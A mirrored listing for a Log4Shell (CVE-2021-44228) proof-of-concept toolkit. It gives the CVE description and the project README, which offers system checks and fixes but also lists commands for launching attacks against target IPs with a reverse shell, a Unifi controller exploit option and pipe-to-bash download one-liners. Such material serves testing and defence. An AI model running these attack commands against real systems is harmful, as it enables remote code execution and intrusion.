CVE-2021-44228 PoC — Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints

Source

https://github.com/suuhm/log4shell4shell

Associated Vulnerability

Title:Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints (CVE-2021-44228)
Description:Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

Description

Log4shell - Multi-Toolkit. Find, Fix & Test possible CVE-2021-44228 vulneraries - provides a complete LOG4SHELL test/attack environment on shell

Readme

# log4shell4shell
Log4j - Multitool. Find &amp; fix possible CVE-2021-44228 vulneraries - provides a complete LOG4SHELL test/attack environment

![Thumb](/logo_banner.png )

# Features

- Check your Linux/Mac/BSD and Windows System for CVE-2021-44228 vulneraries
- Fix your system by deleting log4j java class / or setting some enviroment variables 
- Proof of Concept: you can run a dummy spring boot server for testing the exploit by yourself (https://github.com/christophetd/log4shell-vulnerable-app)
- You can run a attack against a wished IP-Port and include a Base64 Command / Or A simple Reverse Shell
- Full ip-range scanning by https://github.com/fullhunt/log4j-scan

# How to Run on Linux/Mac/BSD:

## Requirements:

- https://docs.docker.com/get-docker/
- Debian / Ubuntu: ```apt update ; apt install default-jre screen python3-pip bash curl```
- OpenSuse: ```zypper ref ; zypper in default-jre screen python3-pip bash curl```
- Redhead-Linux / CentOS: ```yum clean; yum install default-jre screen python3-pip bash curl```
- BSD pkg: ```pkg install default-jre screen python3-pip curl```
- Mac OS (Brew): ```/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" ; brew install default-jre screen python3 pip```

## Quick check your system with this oneliner:

```bash
wget https://raw.githubusercontent.com/suuhm/log4shell4shell/main/log4shell4shell.sh -qO- | bash -s -- --check-system
```

## More Options
### Run a sample attack against IP: 10.4.4.20 Port 8080 loginpage and additionally a Reverse Proxy Shell:

```bash
git clone https://github.com/suuhm/log4shell4shell ; cd log4shell4shell
mv log4shell4shell.sh l4s4s.sh && chmod +x l4s4s.sh
./l4s4s.sh --run-attack http://10.4.4.20:8080/login.php -e
```
Run ```screen -r l4s4s-ldap-srv``` and/or ```screen -r l4s4s-nc-rsh``` to view some attacking infos in Exploit-Server shell: 


### Run a full scan  IP: 10.4.4.20 Port 8080 and additionally a try all tests :

```bash
./l4s4s.sh --python-scan "-u 10.4.4.20:8080 --run-all-tests"
```

### Run a Proof of Concept on a Tomcat Springboot Server:

```bash
./l4s4s.sh --run-dummy-server && \
./l4s4s.sh --run-attack http://127.0.0.1:4280 -e
```

### Run a Unifi-Controller Exploit Attack/Check (on 10.4.4.20:8443):

```bash
./l4s4s.sh --run-attack 10.4.4.20:8443 -e --unifi-post
```

## All available Options

```bash
_|                            _|  _|              _|                  _|  _|  _|  _|              _|                  _|  _|
_|          _|_|      _|_|_|  _|  _|      _|_|_|  _|_|_|      _|_|    _|  _|  _|  _|      _|_|_|  _|_|_|      _|_|    _|  _|
_|        _|    _|  _|    _|  _|_|_|_|  _|_|      _|    _|  _|_|_|_|  _|  _|  _|_|_|_|  _|_|      _|    _|  _|_|_|_|  _|  _|
_|        _|    _|  _|    _|      _|        _|_|  _|    _|  _|        _|  _|      _|        _|_|  _|    _|  _|        _|  _|
_|_|_|_|    _|_|      _|_|_|      _|    _|_|_|    _|    _|    _|_|_|  _|  _|      _|    _|_|_|    _|    _|    _|_|_|  _|  _|
                          _|
                      _|_|


 > Running Log4shell Framework & Check-Toolkit on shell v0.1a (C) 2021 suuhm

Wrong input! Please enter one of these options:

Usage: ./l4s4s.sh [OPTIONS] <IP:PORT|COMMAND>

                        --get-powershell-finder
                        --check-system
                        --fix-log4j
                        --run-dummy-server <JNDIExploit.*.zip>
                        --run-attack <FORMAT: IP:PORT> <-e/-t/'cmd'> [--unifi-post]
                        --python-scan <command>

```

# How to upgrade your linux and/or macos python version:

Just run my helper-script (--list-versions): ``` ./python-upgrader.sh ```

# How to run on Windows x86 / x64:

Just run in Powershell (admin-mode): ``` .\set_windows_fix.ps1 ```


# This script is alpha! So please let me know if you have some issues

# Legal Disclaimer

The project log4shell4shell is made for educational and ethical testing purposes only. Usage of log4j-scan for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

File Snapshot


 [4.0K]  /data/pocs/a9ccbe305e9a6228398a846ee4da3dbaffe7e3eb
├── [ 34K]  LICENSE
├── [9.6K]  log4shell4shell.sh
├── [6.5K]  logo_banner.png
├── [1.1K]  python_upgrader.sh
├── [4.1K]  README.md
└── [ 663]  set_windows_fix.ps1

0 directories, 6 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!